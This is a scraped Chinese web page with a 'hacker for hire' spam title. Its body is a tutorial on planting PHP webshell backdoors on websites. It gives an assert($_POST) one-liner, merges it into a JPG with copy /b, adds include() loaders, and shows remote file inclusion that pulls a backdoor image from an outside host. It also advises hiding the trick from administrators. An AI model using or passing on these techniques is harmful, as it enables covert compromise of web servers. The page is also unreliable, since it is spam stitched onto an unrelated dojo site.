不收定金的黑客专家(不收定金的黑客联系方式

作者:yang77
围观群众:10
更新于
不收定金的黑客专家(不收定金的黑客联系方式

我们平时藏匿图片后门是什么流程呢?我们来看一下

0x01 初级的藏匿方法:

1、建立一个eval.php文件,上面加入我们的后门:

1 <?phpassert($_POST[feiji]);?>

2、找一张图片1.jpg,最好是从目标网站上下载下来的图片。

3、合并图片和php后门:

1 Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg

4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:

1 <?phpinclude(2.jpg);?>

5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。

访问图片正常:

访问images.php页面出现乱码,但是后门已经正常运行:

但是一句话在菜刀里是可以解析成功的:

注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。

0x02 中级藏匿的方法:

1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:

  • 修改ini的配置选项allow_url_fopen和allow_url_include为ON。

    不收定金的黑客专家(不收定金的黑客联系方式

2、创建任何一个php文件中,以images.php为例,写入以下的代码:

1 <?php$filename=$_GET['feiji'];include($filename);?>

3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:

http://127.0.0.1/images/images.php?feiji=http://www.xxxx.com/images/2.jpg密码为feiji

不收定金的黑客专家(不收定金的黑客联系方式

注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。


不收定金的黑客专家(不收定金的黑客联系方式

非特殊说明,本文版权归 正心馆合气道小林道场 所有,转载请注明出处.

本文分类: 社会

本文标题: 不收定金的黑客专家(不收定金的黑客联系方式

本文网址: http://boboaikido.com/shehui/2703.html

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

网站分类
搜索
最新留言
    标签列表